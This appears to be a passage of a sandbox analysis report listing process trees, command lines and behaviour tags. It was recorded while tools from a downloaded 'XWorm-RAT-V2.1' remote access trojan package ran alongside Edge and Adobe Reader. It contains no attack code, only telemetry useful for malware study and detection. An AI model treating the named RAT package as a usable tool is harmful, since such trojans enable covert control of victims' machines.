--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15B5A64AE6FE350026D67382BD5E688A --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:1
  PID: 5824
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 4)
  Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D38B3C5BF85A9F763E2E1F34D1422946 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
  PID: 4232
- C:\Windows\System32\CompPkgSrv.exe (depth 1)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2268
- C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe (depth 1)
  Command line: "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
  PID: 872
- C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe (depth 1)
  Command line: "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"
  PID: 2652
- C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe (depth 1)
  Command line: "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"
  PID: 1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID: 2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9986b3cb8,0x7ff9986b3cc8,0x7ff9986b3cd8
  PID: 2888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  PID: 1112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  PID: 2348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
  PID: 6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  PID: 3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  PID: 3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1
  PID: 1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
  PID: 5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:8
  PID: 2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  PID: 436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
  PID: 1392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  PID: 2468
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:8
  PID: 2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
  PID: 1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:8
  PID: 5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4592 /prefetch:8
  PID: 1124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  PID: 4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  PID: 4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  PID: 420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
  - NTFS ADS
  PID: 4188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  PID: 5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:2
  PID: 7132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  PID: 6316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
  PID: 4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  PID: 732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  PID: 6296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  PID: 5736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
  - NTFS ADS
  PID: 2828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  PID: 1012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:8
  - NTFS ADS
  PID: 3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
  PID: 5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 /prefetch:8
  - NTFS ADS
  PID: 2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
  PID: 6812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
  PID: 6460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
  PID: 6660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  PID: 3288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:12⤵PID:2764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6900 /prefetch:12⤵PID:4156
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:1916
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:6324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:12⤵PID:5520
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7540 /prefetch:82⤵
- NTFS ADS
PID:1184 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:12⤵PID:6264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:12⤵PID:4356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 /prefetch:82⤵
- NTFS ADS
PID:4920 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:12⤵PID:6180
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:12⤵PID:6652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:12⤵PID:1416
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:6064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:12⤵PID:6868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:12⤵PID:2324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:2596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:6888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:82⤵
- NTFS ADS
